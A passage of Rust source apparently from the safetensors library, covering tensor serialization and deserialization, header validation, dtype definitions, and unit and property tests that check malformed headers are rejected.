Cow<[u8]>{ /// (&self.data).into() /// } /// fn data_len(&self) -> usize{ /// self.data.len() /// } /// } /// ``` /// /// For a borrowed tensor: /// /// ```rust /// use safetensors::tensor::{View, Dtype}; /// use std::borrow::Cow; /// struct Tensor<'data>{ dtype: MyDtype, shape: Vec, data: &'data[u8]} /// /// # type MyDtype = Dtype; /// impl<'data> View for Tensor<'data>{ /// fn dtype(&self) -> Dtype{ /// self.dtype.into() /// } /// fn shape(&self) -> &[usize]{ /// &self.shape /// } /// fn data(&self) -> Cow<[u8]>{ /// self.data.into() /// } /// fn data_len(&self) -> usize{ /// self.data.len() /// } /// } /// ``` /// /// Now if you have some unknown buffer that could be on GPU for instance, /// you can implement the trait to return an owned local buffer containing the data /// on CPU (needed to write on disk) /// ```rust /// use safetensors::tensor::{View, Dtype}; /// use std::borrow::Cow; /// /// # type MyDtype = Dtype; /// # type OpaqueGpu = Vec; /// struct Tensor{ dtype: MyDtype, shape: Vec, data: OpaqueGpu } /// /// impl View for Tensor{ /// fn dtype(&self) -> Dtype{ /// self.dtype.into() /// } /// fn shape(&self) -> &[usize]{ /// &self.shape /// } /// fn data(&self) -> Cow<[u8]>{ /// // This copies data from GPU to CPU. /// let data: Vec = self.data.to_vec(); /// data.into() /// } /// fn data_len(&self) -> usize{ /// let n: usize = self.shape.iter().product(); /// let bytes_per_element = self.dtype.size(); /// n * bytes_per_element /// } /// } /// ``` pub trait View { /// The `Dtype` of the tensor fn dtype(&self) -> Dtype; /// The shape of the tensor fn shape(&self) -> &[usize]; /// The data of the tensor fn data(&self) -> Cow<[u8]>; /// The length of the data, in bytes. /// This is necessary as this might be faster to get than `data().len()` /// for instance for tensors residing in GPU. 
fn data_len(&self) -> usize; } fn prepare + Ord + core::fmt::Display, V: View, I: IntoIterator>( data: I, data_info: &Option>, // ) -> Result<(Metadata, Vec<&'hash TensorView<'data>>, usize), SafeTensorError> { ) -> Result<(PreparedData, Vec), SafeTensorError> { // Make sure we're sorting by descending dtype alignment // Then by name let mut data: Vec<_> = data.into_iter().collect(); data.sort_by(|(lname, left), (rname, right)| { right.dtype().cmp(&left.dtype()).then(lname.cmp(rname)) }); let mut tensors: Vec = Vec::with_capacity(data.len()); let mut hmetadata = Vec::with_capacity(data.len()); let mut offset = 0; let data: Vec<_> = data.into_iter().collect(); for (name, tensor) in data { let n = tensor.data_len(); let tensor_info = TensorInfo { dtype: tensor.dtype(), shape: tensor.shape().to_vec(), data_offsets: (offset, offset + n), }; offset += n; hmetadata.push((name.to_string(), tensor_info)); tensors.push(tensor); } let metadata: Metadata = Metadata::new(data_info.clone(), hmetadata)?; let mut metadata_buf = serde_json::to_string(&metadata)?.into_bytes(); // Force alignment to 8 bytes. let extra = (8 - metadata_buf.len() % 8) % 8; metadata_buf.extend(vec![b' '; extra]); let n: u64 = metadata_buf.len() as u64; Ok(( PreparedData { n, header_bytes: metadata_buf, offset, }, tensors, )) } /// Serialize to an owned byte buffer the dictionnary of tensors. pub fn serialize< S: AsRef + Ord + core::fmt::Display, V: View, I: IntoIterator, >( data: I, data_info: &Option>, ) -> Result, SafeTensorError> { let ( PreparedData { n, header_bytes, offset, }, tensors, ) = prepare(data, data_info)?; let expected_size = 8 + header_bytes.len() + offset; let mut buffer: Vec = Vec::with_capacity(expected_size); buffer.extend(&n.to_le_bytes().to_vec()); buffer.extend(&header_bytes); for tensor in tensors { buffer.extend(tensor.data().as_ref()); } Ok(buffer) } /// Serialize to a regular file the dictionnary of tensors. /// Writing directly to file reduces the need to allocate the whole amount to /// memory. #[cfg(feature = "std")] pub fn serialize_to_file< S: AsRef + Ord + core::fmt::Display, V: View, I: IntoIterator, >( data: I, data_info: &Option>, filename: &std::path::Path, ) -> Result<(), SafeTensorError> { let ( PreparedData { n, header_bytes, .. }, tensors, ) = prepare(data, data_info)?; let mut f = std::io::BufWriter::new(std::fs::File::create(filename)?); f.write_all(n.to_le_bytes().as_ref())?; f.write_all(&header_bytes)?; for tensor in tensors { f.write_all(tensor.data().as_ref())?; } f.flush()?; Ok(()) } /// A structure owning some metadata to lookup tensors on a shared `data` /// byte-buffer (not owned). #[derive(Debug)] pub struct SafeTensors<'data> { metadata: Metadata, data: &'data [u8], } impl<'data> SafeTensors<'data> { /// Given a byte-buffer representing the whole safetensor file /// parses the header, and returns the size of the header + the parsed data. 
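    ///
    /// Example, reusing the buffer shown in the `deserialize` documentation:
    ///
    /// ```
    /// use safetensors::SafeTensors;
    ///
    /// let serialized = b"<\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,2],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
    /// let (header_size, metadata) = SafeTensors::read_metadata(serialized).unwrap();
    /// // The first 8 bytes encode the JSON header length (60 bytes here).
    /// assert_eq!(header_size, 60);
    /// assert!(metadata.info("test").is_some());
    /// ```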
pub fn read_metadata<'in_data>( buffer: &'in_data [u8], ) -> Result<(usize, Metadata), SafeTensorError> where 'in_data: 'data, { let buffer_len = buffer.len(); if buffer_len < 8 { return Err(SafeTensorError::HeaderTooSmall); } let arr: [u8; 8] = [ buffer[0], buffer[1], buffer[2], buffer[3], buffer[4], buffer[5], buffer[6], buffer[7], ]; let n: usize = u64::from_le_bytes(arr) .try_into() .map_err(|_| SafeTensorError::HeaderTooLarge)?; if n > MAX_HEADER_SIZE { return Err(SafeTensorError::HeaderTooLarge); } let stop = n .checked_add(8) .ok_or(SafeTensorError::InvalidHeaderLength)?; if stop > buffer_len { return Err(SafeTensorError::InvalidHeaderLength); } let string = core::str::from_utf8(&buffer[8..stop]).map_err(|_| SafeTensorError::InvalidHeader)?; // Assert the string starts with { // NOTE: Add when we move to 0.4.0 // if !string.starts_with('{') { // return Err(SafeTensorError::InvalidHeaderStart); // } let metadata: Metadata = serde_json::from_str(string) .map_err(|_| SafeTensorError::InvalidHeaderDeserialization)?; let buffer_end = metadata.validate()?; if buffer_end + 8 + n != buffer_len { return Err(SafeTensorError::MetadataIncompleteBuffer); } Ok((n, metadata)) } /// Given a byte-buffer representing the whole safetensor file /// parses it and returns the Deserialized form (No Tensor allocation). /// /// ``` /// use safetensors::SafeTensors; /// use memmap2::MmapOptions; /// use std::fs::File; /// /// let filename = "model.safetensors"; /// # use std::io::Write; /// # let serialized = b"<\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,2],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; /// # File::create(filename).unwrap().write(serialized).unwrap(); /// let file = File::open(filename).unwrap(); /// let buffer = unsafe { MmapOptions::new().map(&file).unwrap() }; /// let tensors = SafeTensors::deserialize(&buffer).unwrap(); /// let tensor = tensors /// .tensor("test") /// .unwrap(); /// ``` pub fn deserialize<'in_data>(buffer: &'in_data [u8]) -> Result where 'in_data: 'data, { let (n, metadata) = SafeTensors::read_metadata(buffer)?; let data = &buffer[n + 8..]; Ok(Self { metadata, data }) } /// Returns the tensors contained within the SafeTensors. /// The tensors returned are merely views and the data is not owned by this /// structure. pub fn tensors(&self) -> Vec<(String, TensorView<'data>)> { let mut tensors = Vec::with_capacity(self.metadata.index_map.len()); for (name, &index) in &self.metadata.index_map { let info = &self.metadata.tensors[index]; let tensorview = TensorView { dtype: info.dtype, shape: info.shape.clone(), data: &self.data[info.data_offsets.0..info.data_offsets.1], }; tensors.push((name.to_string(), tensorview)); } tensors } /// Returns an iterator over the tensors contained within the SafeTensors. /// The tensors returned are merely views and the data is not owned by this /// structure. pub fn iter<'a>(&'a self) -> impl Iterator)> { self.metadata.index_map.iter().map(|(name, &idx)| { let info = &self.metadata.tensors[idx]; ( name.as_str(), TensorView { dtype: info.dtype, shape: info.shape.clone(), data: &self.data[info.data_offsets.0..info.data_offsets.1], }, ) }) } /// Allow the user to get a specific tensor within the SafeTensors. /// The tensor returned is merely a view and the data is not owned by this /// structure. 
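    ///
    /// Example: asking for an unknown name returns a `TensorNotFound` error.
    ///
    /// ```
    /// use safetensors::SafeTensors;
    ///
    /// let serialized = b"<\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,2],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
    /// let tensors = SafeTensors::deserialize(serialized).unwrap();
    /// let view = tensors.tensor("test").unwrap();
    /// assert_eq!(view.shape(), vec![2, 2]);
    /// assert!(tensors.tensor("does_not_exist").is_err());
    /// ```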
pub fn tensor(&self, tensor_name: &str) -> Result, SafeTensorError> { if let Some(index) = &self.metadata.index_map.get(tensor_name) { if let Some(info) = &self.metadata.tensors.get(**index) { Ok(TensorView { dtype: info.dtype, shape: info.shape.clone(), data: &self.data[info.data_offsets.0..info.data_offsets.1], }) } else { Err(SafeTensorError::TensorNotFound(tensor_name.to_string())) } } else { Err(SafeTensorError::TensorNotFound(tensor_name.to_string())) } } /// Return the names of the tensors within the SafeTensors. /// These are used as keys to access to the actual tensors, that can be /// retrieved using the tensor method. pub fn names(&self) -> Vec<&'_ String> { self.metadata.index_map.keys().collect() } /// Return how many tensors are currently stored within the SafeTensors. #[inline] pub fn len(&self) -> usize { self.metadata.tensors.len() } /// Indicate if the SafeTensors contains or not any tensor. #[inline] pub fn is_empty(&self) -> bool { self.metadata.tensors.is_empty() } } /// The stuct representing the header of safetensor files which allow /// indexing into the raw byte-buffer array and how to interpret it. #[derive(Debug, Clone)] pub struct Metadata { metadata: Option>, tensors: Vec, index_map: HashMap, } /// Helper struct used only for serialization deserialization #[derive(Serialize, Deserialize)] struct HashMetadata { #[serde(skip_serializing_if = "Option::is_none")] #[serde(rename = "__metadata__")] metadata: Option>, #[serde(flatten)] tensors: HashMap, } impl<'de> Deserialize<'de> for Metadata { fn deserialize(deserializer: D) -> Result where D: Deserializer<'de>, { let hashdata: HashMetadata = HashMetadata::deserialize(deserializer)?; let (metadata, tensors) = (hashdata.metadata, hashdata.tensors); let mut tensors: Vec<_> = tensors.into_iter().collect(); // We need to sort by offsets // Previous versions might have a different ordering // Than we expect (Not aligned ordered, but purely name ordered, // or actually any order). 
tensors.sort_by(|(_, left), (_, right)| left.data_offsets.cmp(&right.data_offsets)); Metadata::new(metadata, tensors).map_err(serde::de::Error::custom) } } impl Serialize for Metadata { fn serialize(&self, serializer: S) -> Result where S: Serializer, { let mut names = vec![""; self.index_map.len()]; for (name, index) in &self.index_map { names[*index] = name; } let tensors: Vec<_> = names.iter().zip(self.tensors.iter()).collect(); let length = if let Some(metadata) = &self.metadata { metadata.len() } else { 0 }; let mut map = serializer.serialize_map(Some(tensors.len() + length))?; if let Some(metadata) = &self.metadata { map.serialize_entry("__metadata__", metadata)?; } for (name, info) in tensors { map.serialize_entry(&name, &info)?; } map.end() } } impl Metadata { fn new( metadata: Option>, tensors: Vec<(String, TensorInfo)>, ) -> Result { let mut index_map = HashMap::with_capacity(tensors.len()); let tensors: Vec<_> = tensors .into_iter() .enumerate() .map(|(index, (k, tensor))| { index_map.insert(k, index); tensor }) .collect(); let metadata = Self { metadata, tensors, index_map, }; // metadata.validate()?; Ok(metadata) } fn validate(&self) -> Result { let mut start = 0; for (i, info) in self.tensors.iter().enumerate() { let (s, e) = info.data_offsets; if s != start || e < s { let tensor_name = self .index_map .iter() .find_map(|(name, &index)| if index == i { Some(&name[..]) } else { None }) .unwrap_or("no_tensor"); return Err(SafeTensorError::InvalidOffset(tensor_name.to_string())); } start = e; let nelements: usize = info .shape .iter() .cloned() .try_fold(1usize, usize::checked_mul) .ok_or(SafeTensorError::ValidationOverflow)?; let nbytes = nelements .checked_mul(info.dtype.size()) .ok_or(SafeTensorError::ValidationOverflow)?; if (e - s) != nbytes { return Err(SafeTensorError::TensorInvalidInfo); } } Ok(start) } /// Gives back the tensor metadata pub fn info(&self, name: &str) -> Option<&TensorInfo> { let index = self.index_map.get(name)?; self.tensors.get(*index) } /// Gives back the tensor metadata pub fn tensors(&self) -> HashMap { self.index_map .iter() .map(|(tensor_name, index)| (tensor_name.clone(), &self.tensors[*index])) .collect() } /// Gives back the tensor metadata pub fn metadata(&self) -> &Option> { &self.metadata } } /// A view of a Tensor within the file. 
/// Contains references to data within the full byte-buffer /// And is thus a readable view of a single tensor #[derive(Debug, PartialEq, Eq, Clone)] pub struct TensorView<'data> { dtype: Dtype, shape: Vec, data: &'data [u8], } impl View for &TensorView<'_> { fn dtype(&self) -> Dtype { self.dtype } fn shape(&self) -> &[usize] { &self.shape } fn data(&self) -> Cow<[u8]> { self.data.into() } fn data_len(&self) -> usize { self.data.len() } } impl View for TensorView<'_> { fn dtype(&self) -> Dtype { self.dtype } fn shape(&self) -> &[usize] { &self.shape } fn data(&self) -> Cow<[u8]> { self.data.into() } fn data_len(&self) -> usize { self.data.len() } } impl<'data> TensorView<'data> { /// Create new tensor view pub fn new( dtype: Dtype, shape: Vec, data: &'data [u8], ) -> Result { let n = data.len(); let n_elements: usize = shape.iter().product(); if n != n_elements * dtype.size() { Err(SafeTensorError::InvalidTensorView(dtype, shape, n)) } else { Ok(Self { dtype, shape, data }) } } /// The current tensor dtype pub fn dtype(&self) -> Dtype { self.dtype } /// The current tensor shape pub fn shape(&'data self) -> &'data [usize] { &self.shape } /// The current tensor byte-buffer pub fn data(&self) -> &'data [u8] { self.data } /// The various pieces of the data buffer according to the asked slice pub fn sliced_data( &'data self, slices: &[TensorIndexer], ) -> Result, InvalidSlice> { SliceIterator::new(self, slices) } } /// A single tensor information. /// Endianness is assumed to be little endian /// Ordering is assumed to be 'C'. #[derive(Debug, Deserialize, Serialize, Clone)] pub struct TensorInfo { /// The type of each element of the tensor pub dtype: Dtype, /// The shape of the tensor pub shape: Vec, /// The offsets to find the data within the byte-buffer array. pub data_offsets: (usize, usize), } /// The various available dtypes. They MUST be in increasing alignment order #[derive(Debug, Deserialize, Serialize, Clone, Copy, PartialEq, Eq, Ord, PartialOrd)] #[non_exhaustive] pub enum Dtype { /// Boolan type BOOL, /// Unsigned byte U8, /// Signed byte I8, /// FP8 _ #[allow(non_camel_case_types)] F8_E5M2, /// FP8 _ #[allow(non_camel_case_types)] F8_E4M3, /// Signed integer (16-bit) I16, /// Unsigned integer (16-bit) U16, /// Half-precision floating point F16, /// Brain floating point BF16, /// Signed integer (32-bit) I32, /// Unsigned integer (32-bit) U32, /// Floating point (32-bit) F32, /// Floating point (64-bit) F64, /// Signed integer (64-bit) I64, /// Unsigned integer (64-bit) U64, } impl Dtype { /// Gives out the size (in bytes) of 1 element of this dtype. pub fn size(&self) -> usize { match self { Dtype::BOOL => 1, Dtype::U8 => 1, Dtype::I8 => 1, Dtype::F8_E5M2 => 1, Dtype::F8_E4M3 => 1, Dtype::I16 => 2, Dtype::U16 => 2, Dtype::I32 => 4, Dtype::U32 => 4, Dtype::I64 => 8, Dtype::U64 => 8, Dtype::F16 => 2, Dtype::BF16 => 2, Dtype::F32 => 4, Dtype::F64 => 8, } } } #[cfg(test)] mod tests { use super::*; use crate::slice::IndexOp; use proptest::prelude::*; #[cfg(not(feature = "std"))] extern crate std; use std::io::Write; const MAX_DIMENSION: usize = 8; const MAX_SIZE: usize = 8; const MAX_TENSORS: usize = 8; fn arbitrary_dtype() -> impl Strategy { prop_oneof![ Just(Dtype::BOOL), Just(Dtype::U8), Just(Dtype::I8), Just(Dtype::I16), Just(Dtype::U16), Just(Dtype::I32), Just(Dtype::U32), Just(Dtype::I64), Just(Dtype::U64), Just(Dtype::F16), Just(Dtype::BF16), Just(Dtype::F32), Just(Dtype::F64), ] } fn arbitrary_shape() -> impl Strategy> { // We do not allow empty shapes or 0 sizes. 
(1..MAX_DIMENSION).prop_flat_map(|length| prop::collection::vec(1..MAX_SIZE, length)) } fn arbitrary_metadata() -> impl Strategy { // We generate at least one tensor. (1..MAX_TENSORS) .prop_flat_map(|size| { // Returns a strategy generating `size` data types and shapes. ( prop::collection::vec(arbitrary_dtype(), size), prop::collection::vec(arbitrary_shape(), size), ) }) .prop_map(|(dtypes, shapes)| { // Returns a valid metadata object for a random (length, dtypes, shapes) triple. let mut start = 0; let tensors: Vec = dtypes .iter() .zip(shapes) .map(|(dtype, shape)| { // This cannot overflow because the size of // the vector and elements are so small. let length: usize = shape.iter().product(); let end = start + length * dtype.size(); let tensor = TensorInfo { dtype: *dtype, shape, data_offsets: (start, end), }; start = end; tensor }) .collect(); let index_map = (0..tensors.len()) .map(|index| (format!("t.{index}"), index)) .collect(); Metadata { metadata: None, tensors, index_map, } }) } /// This method returns the size of the data corresponding to the metadata. It /// assumes that `metadata` contains at least one tensor, and that tensors are /// ordered by offset in `metadata.tensors`. /// /// # Panics /// /// This method will panic if `metadata` does not contain any tensors. fn data_size(metadata: &Metadata) -> usize { metadata.tensors.last().unwrap().data_offsets.1 } proptest! { #![proptest_config(ProptestConfig::with_cases(20))] #[test] fn test_indexing(metadata in arbitrary_metadata()) { let data = vec![0u8; data_size(&metadata)]; let tensors = SafeTensors { metadata, data: &data }; for name in tensors.names() { assert!(tensors.tensor(name).is_ok()); } } #[test] fn test_roundtrip(metadata in arbitrary_metadata()) { let data: Vec = (0..data_size(&metadata)).map(|x| x as u8).collect(); let before = SafeTensors { metadata, data: &data }; let tensors = before.tensors(); let bytes = serialize(tensors.iter().map(|(name, view)| (name.to_string(), view)), &None).unwrap(); let after = SafeTensors::deserialize(&bytes).unwrap(); // Check that the tensors are the same after deserialization. 
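            // Also check that each deserialized tensor's bytes are aligned to its
            // dtype size (serialization pads the header to a multiple of 8 bytes
            // and writes tensors in descending alignment order).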
assert_eq!(before.names().len(), after.names().len()); for name in before.names() { let tensor_before = before.tensor(name).unwrap(); let tensor_after = after.tensor(name).unwrap(); assert_eq!(tensor_after.data().as_ptr() as usize % tensor_after.dtype().size(), 0); assert_eq!(tensor_before, tensor_after); } } } #[test] fn test_serialization() { let data: Vec = vec![0.0f32, 1.0, 2.0, 3.0, 4.0, 5.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect(); let shape = vec![1, 2, 3]; let attn_0 = TensorView::new(Dtype::F32, shape, &data).unwrap(); let metadata: HashMap = [("attn.0".to_string(), attn_0)].into_iter().collect(); let out = serialize(&metadata, &None).unwrap(); assert_eq!( out, [ 64, 0, 0, 0, 0, 0, 0, 0, 123, 34, 97, 116, 116, 110, 46, 48, 34, 58, 123, 34, 100, 116, 121, 112, 101, 34, 58, 34, 70, 51, 50, 34, 44, 34, 115, 104, 97, 112, 101, 34, 58, 91, 49, 44, 50, 44, 51, 93, 44, 34, 100, 97, 116, 97, 95, 111, 102, 102, 115, 101, 116, 115, 34, 58, 91, 48, 44, 50, 52, 93, 125, 125, 0, 0, 0, 0, 0, 0, 128, 63, 0, 0, 0, 64, 0, 0, 64, 64, 0, 0, 128, 64, 0, 0, 160, 64 ] ); let _parsed = SafeTensors::deserialize(&out).unwrap(); } #[test] fn test_empty() { let tensors: HashMap = HashMap::new(); let out = serialize(&tensors, &None).unwrap(); assert_eq!( out, [8, 0, 0, 0, 0, 0, 0, 0, 123, 125, 32, 32, 32, 32, 32, 32] ); let _parsed = SafeTensors::deserialize(&out).unwrap(); let metadata: Option> = Some( [("framework".to_string(), "pt".to_string())] .into_iter() .collect(), ); let out = serialize(&tensors, &metadata).unwrap(); assert_eq!( out, [ 40, 0, 0, 0, 0, 0, 0, 0, 123, 34, 95, 95, 109, 101, 116, 97, 100, 97, 116, 97, 95, 95, 34, 58, 123, 34, 102, 114, 97, 109, 101, 119, 111, 114, 107, 34, 58, 34, 112, 116, 34, 125, 125, 32, 32, 32, 32, 32 ] ); let _parsed = SafeTensors::deserialize(&out).unwrap(); } #[test] fn test_serialization_forced_alignement() { let data: Vec = vec![0.0f32, 1.0, 2.0, 3.0, 4.0, 5.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect(); let shape = vec![1, 1, 2, 3]; let attn_0 = TensorView::new(Dtype::F32, shape, &data).unwrap(); let metadata: HashMap = // Smaller string to force misalignment compared to previous test. [("attn0".to_string(), attn_0)].into_iter().collect(); let out = serialize(&metadata, &None).unwrap(); assert_eq!( out, [ 72, 0, 0, 0, 0, 0, 0, 0, 123, 34, 97, 116, 116, 110, 48, 34, 58, 123, 34, 100, 116, 121, 112, 101, 34, 58, 34, 70, 51, 50, 34, 44, 34, 115, 104, 97, 112, 101, 34, 58, 91, 49, 44, 49, 44, 50, 44, 51, 93, 44, 34, 100, 97, 116, 97, 95, 111, 102, 102, // All the 32 are forcing alignement of the tensor data for casting to f32, f64 // etc.. 
115, 101, 116, 115, 34, 58, 91, 48, 44, 50, 52, 93, 125, 125, 32, 32, 32, 32, 32, 32, 32, 0, 0, 0, 0, 0, 0, 128, 63, 0, 0, 0, 64, 0, 0, 64, 64, 0, 0, 128, 64, 0, 0, 160, 64 ], ); let parsed = SafeTensors::deserialize(&out).unwrap(); let tensor = parsed.tensor("attn0").unwrap(); assert_eq!(tensor.data().as_ptr() as usize % tensor.dtype().size(), 0); } #[test] fn test_slicing() { let data: Vec = vec![0.0f32, 1.0, 2.0, 3.0, 4.0, 5.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect(); let attn_0 = TensorView { dtype: Dtype::F32, shape: vec![1, 2, 3], data: &data, }; let metadata: HashMap = [("attn.0".to_string(), attn_0)].into_iter().collect(); let out = serialize(&metadata, &None).unwrap(); let parsed = SafeTensors::deserialize(&out).unwrap(); let out_buffer: Vec = parsed .tensor("attn.0") .unwrap() .slice((.., ..1)) .unwrap() .flat_map(|b| b.to_vec()) .collect(); assert_eq!(out_buffer, vec![0u8, 0, 0, 0, 0, 0, 128, 63, 0, 0, 0, 64]); assert_eq!( out_buffer, vec![0.0f32, 1.0, 2.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect::>() ); let out_buffer: Vec = parsed .tensor("attn.0") .unwrap() .slice((.., .., ..1)) .unwrap() .flat_map(|b| b.to_vec()) .collect(); assert_eq!(out_buffer, vec![0u8, 0, 0, 0, 0, 0, 64, 64]); assert_eq!( out_buffer, vec![0.0f32, 3.0] .into_iter() .flat_map(|f| f.to_le_bytes()) .collect::>() ); } #[test] fn test_gpt2() { gpt2_like(12, "gpt2"); } #[test] fn test_gpt2_tiny() { gpt2_like(6, "gpt2_tiny"); } fn gpt2_like(n_heads: usize, model_id: &str) { let mut tensors_desc = vec![]; tensors_desc.push(("wte".to_string(), vec![50257, 768])); tensors_desc.push(("wpe".to_string(), vec![1024, 768])); for i in 0..n_heads { tensors_desc.push((format!("h.{i}.ln_1.weight"), vec![768])); tensors_desc.push((format!("h.{i}.ln_1.bias"), vec![768])); tensors_desc.push((format!("h.{i}.attn.bias"), vec![1, 1, 1024, 1024])); tensors_desc.push((format!("h.{i}.attn.c_attn.weight"), vec![768, 2304])); tensors_desc.push((format!("h.{i}.attn.c_attn.bias"), vec![2304])); tensors_desc.push((format!("h.{i}.attn.c_proj.weight"), vec![768, 768])); tensors_desc.push((format!("h.{i}.attn.c_proj.bias"), vec![768])); tensors_desc.push((format!("h.{i}.ln_2.weight"), vec![768])); tensors_desc.push((format!("h.{i}.ln_2.bias"), vec![768])); tensors_desc.push((format!("h.{i}.mlp.c_fc.weight"), vec![768, 3072])); tensors_desc.push((format!("h.{i}.mlp.c_fc.bias"), vec![3072])); tensors_desc.push((format!("h.{i}.mlp.c_proj.weight"), vec![3072, 768])); tensors_desc.push((format!("h.{i}.mlp.c_proj.bias"), vec![768])); } tensors_desc.push(("ln_f.weight".to_string(), vec![768])); tensors_desc.push(("ln_f.bias".to_string(), vec![768])); let dtype = Dtype::F32; let n: usize = tensors_desc .iter() .map(|(_, shape)| shape.iter().product::()) .sum::() * dtype.size(); // 4 let all_data = vec![0; n]; let mut metadata = HashMap::with_capacity(tensors_desc.len()); let mut offset = 0; for (name, shape) in tensors_desc { let n: usize = shape.iter().product(); let buffer = &all_data[offset..offset + n * dtype.size()]; let tensor = TensorView::new(dtype, shape, buffer).unwrap(); metadata.insert(name, tensor); offset += n; } let filename = format!("./out_{model_id}.safetensors"); let out = serialize(&metadata, &None).unwrap(); std::fs::write(&filename, out).unwrap(); let raw = std::fs::read(&filename).unwrap(); let _deserialized = SafeTensors::deserialize(&raw).unwrap(); std::fs::remove_file(&filename).unwrap(); // File api #[cfg(feature = "std")] { serialize_to_file(&metadata, &None, 
std::path::Path::new(&filename)).unwrap(); let raw = std::fs::read(&filename).unwrap(); let _deserialized = SafeTensors::deserialize(&raw).unwrap(); std::fs::remove_file(&filename).unwrap(); } } #[test] fn test_empty_shapes_allowed() { let serialized = b"8\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[],\"data_offsets\":[0,4]}}\x00\x00\x00\x00"; let loaded = SafeTensors::deserialize(serialized).unwrap(); assert_eq!(loaded.names(), vec!["test"]); let tensor = loaded.tensor("test").unwrap(); assert!(tensor.shape().is_empty()); assert_eq!(tensor.dtype(), Dtype::I32); // 4 bytes assert_eq!(tensor.data(), b"\0\0\0\0"); } #[test] fn test_deserialization() { let serialized = b"<\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,2],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; let loaded = SafeTensors::deserialize(serialized).unwrap(); assert_eq!(loaded.len(), 1); assert_eq!(loaded.names(), vec!["test"]); let tensor = loaded.tensor("test").unwrap(); assert_eq!(tensor.shape(), vec![2, 2]); assert_eq!(tensor.dtype(), Dtype::I32); // 16 bytes assert_eq!(tensor.data(), b"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"); } #[test] fn test_lifetimes() { let serialized = b"<\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,2],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; let tensor = { let loaded = SafeTensors::deserialize(serialized).unwrap(); loaded.tensor("test").unwrap() }; assert_eq!(tensor.shape(), vec![2, 2]); assert_eq!(tensor.dtype(), Dtype::I32); // 16 bytes assert_eq!(tensor.data(), b"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0"); } #[test] fn test_json_attack() { let mut tensors = HashMap::new(); let dtype = Dtype::F32; let shape = vec![2, 2]; let data_offsets = (0, 16); for i in 0..10 { tensors.insert( format!("weight_{i}"), TensorInfo { dtype, shape: shape.clone(), data_offsets, }, ); } let metadata = HashMetadata { metadata: None, tensors, }; let serialized = serde_json::to_string(&metadata).unwrap(); let serialized = serialized.as_bytes(); let n = serialized.len(); let filename = "out.safetensors"; let mut f = std::io::BufWriter::new(std::fs::File::create(filename).unwrap()); f.write_all(n.to_le_bytes().as_ref()).unwrap(); f.write_all(serialized).unwrap(); f.write_all(b"\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0").unwrap(); f.flush().unwrap(); let reloaded = std::fs::read(filename).unwrap(); match SafeTensors::deserialize(&reloaded) { Err(SafeTensorError::InvalidOffset(_)) => { // Yes we have the correct error, name of the tensor is random though } Err(err) => panic!("Unexpected error {err:?}"), Ok(_) => panic!("This should not be able to be deserialized"), } } #[test] fn test_metadata_incomplete_buffer() { let serialized = b"<\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,2],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00extra_bogus_data_for_polyglot_file"; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::MetadataIncompleteBuffer) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } // Missing data in the buffer let serialized = b"<\x00\x00\x00\x00\x00\x00\x00{\"test\":{\"dtype\":\"I32\",\"shape\":[2,2],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; // <--- missing 2 bytes match SafeTensors::deserialize(serialized) { Err(SafeTensorError::MetadataIncompleteBuffer) => { // Yes we have the correct error } _ => 
panic!("This should not be able to be deserialized"), } } #[test] fn test_header_too_large() { let serialized = b"<\x00\x00\x00\x00\xff\xff\xff{\"test\":{\"dtype\":\"I32\",\"shape\":[2,2],\"data_offsets\":[0,16]}}\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::HeaderTooLarge) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } } #[test] fn test_header_too_small() { let serialized = b""; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::HeaderTooSmall) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } } #[test] fn test_invalid_header_length() { let serialized = b"<\x00\x00\x00\x00\x00\x00\x00"; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::InvalidHeaderLength) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } } #[test] fn test_invalid_header_non_utf8() { let serialized = b"\x01\x00\x00\x00\x00\x00\x00\x00\xff"; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::InvalidHeader) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } } #[test] fn test_invalid_header_not_json() { let serialized = b"\x01\x00\x00\x00\x00\x00\x00\x00{"; match SafeTensors::deserialize(serialized) { Err(SafeTensorError::InvalidHeaderDeserialization) => { // Yes we have the correct error } _ => panic!("This should not be able to be deserialized"), } } #[test] /// Test that the JSON header may be trailing-padded with JSON whitespace characters. fn test_whitespace_padded_header() { let 